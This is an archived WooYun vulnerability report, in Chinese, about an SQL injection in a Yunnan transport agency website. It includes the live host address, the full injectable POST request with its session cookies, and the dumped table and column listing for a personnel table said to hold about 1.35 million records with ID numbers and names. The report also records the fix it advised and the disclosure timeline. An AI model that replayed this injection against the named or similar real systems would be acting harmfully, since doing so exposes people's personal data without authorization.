乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-09: 细节已通知厂商并且等待厂商处理中 2015-09-11: 厂商已经确认,细节仅向厂商公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-26: 细节向公众公开
RT
http://221.3.143.66:8090/
SQL注入
POST http://221.3.143.66:8090/yzJyyhController/getjyyhpage HTTP/1.1Host: 221.3.143.66:8090User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://221.3.143.66:8090/yzJyyhController/getbusinessownerlistContent-Length: 109Cookie: JSESSIONID=ABA11B24EA4626C1B8432C4FC61C6171; ASP.NET_SessionId=a1qlr255muswdeadpjhw443lConnection: keep-alivePragma: no-cacheCache-Control: no-cacheqc=1111111111&yhxydj=%E4%BC%98%E8%89%AF&dq=&xzqh=%E4%BA%91%E5%8D%97%E7%9C%81&pager.pageNo=1&pager.pageSize=10
当前库
所有库
表
Database: YNJTW[90 tables]+--------------------------+| C || CODE || SYS_TEMP_FBT || TB_4SSHOPINFO || TB_ACCOUNT || TB_ANMCOLUMN || TB_ANNOUNCEMENT || TB_BACK_CSI || TB_BACK_DSI || TB_BACK_POINT || TB_BACK_PSI || TB_BACK_RDI || TB_CHECKSTATIONINFO || TB_CODE || TB_CSGL || TB_DRIVINGSCHOOLINFO || TB_FILE || TB_GLSG_QYXY || TB_GZCX_MH_JCXX || TB_GZCX_SL_GKXX || TB_GZCX_SL_MTBWXX || TB_GZCX_TL_CZXX || TB_MODULE || TB_PASSENGERSTATIONINFO || TB_POINT || TB_POINT_TRAFFIC || TB_POINT_TRAFFIC_CURRENT || TB_QX_QXBS || TB_QX_QXZSKSJ || TB_QX_QXZXX || TB_QX_QXZYBSJ || TB_REGION || TB_REPAIRDEPOTINFO || TB_ROLE || TB_ROLEPERMISSION || TB_SCHEDULE || TB_SCHEDULE_DAY || TB_SCHEDULE_EXT || TB_SEQUENCE || TB_SERVICEAREAINFO || TB_STATION || TB_STATIONNAME_SUG || TB_STATION_TEMP || TB_SYSTEM || TB_TAXI || TB_UNIT || TB_UNITGROUP || TB_UNITGROUPITEM || TB_UNITTYPE || TB_UNITUSER || TB_USER || TB_USERROLE || TB_YZ_CYZGXX || TB_YZ_DLYSZ || TB_YZ_JLY || TB_YZ_JX || TB_YZ_JYYH || TB_YZ_RYXX || TB_YZ_YYCL || TB_YZ_ZLCH || TB_ZHCX_BUS || TB_ZHCX_CHECKSTATION || TB_ZHCX_DRIVERSCHOOL || TB_ZHCX_ETC || TB_ZHCX_FEEDBACK || TB_ZHCX_FSSHOP || TB_ZHCX_LOCATIONMARK || TB_ZHCX_LOGPHONE || TB_ZHCX_LOGWEB || TB_ZHCX_PASSENGERSTATION || TB_ZHCX_PROCLAMATION || TB_ZHCX_PUBLICEVENT || TB_ZHCX_PUBLICEVENT_LINE || TB_ZHCX_PUSH || TB_ZHCX_RENTALCAR || TB_ZHCX_REPAIRDEPOT || TB_ZHCX_SAFECHECKSTATION || TB_ZHCX_SERVICEAREA || TB_ZHCX_SFXXMX || TB_ZHCX_SFXXMX_CX || TB_ZHCX_SFZ || TB_ZHCX_STOP || TB_ZHCX_TAXIINFO || TB_ZHCX_TRAFFIC || TB_ZHCX_WBTRAFFICINFO || TB_ZJ_CLJG || TEMP_CYZG_AREA || TEMP_CYZG_LBBM || TEMP_SYSDICTIONARY || TEST |+--------------------------+
字段
Database: YNJTWTable: TB_YZ_RYXX[14 columns]+------------+----------+| Column | Type |+------------+----------+| CSRQ | VARCHAR2 || CYZGLBBM | VARCHAR2 || FWDWMC | VARCHAR2 || HYLBBM | VARCHAR2 || ID | NUMBER || SCHDCYZGRQ | VARCHAR2 || SFZH | VARCHAR2 || SSDQDM | VARCHAR2 || SSDQMC | VARCHAR2 || SSXSDM | VARCHAR2 || SSXSMC | VARCHAR2 || XB | VARCHAR2 || XM | VARCHAR2 || ZZ | VARCHAR2 |+------------+----------+
人员信息(1351200条)
过滤参数或上Waf
危害等级:中
漏洞Rank:10
确认时间:2015-09-11 13:49
CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。同时同步抄报给交通部通报中心.
暂无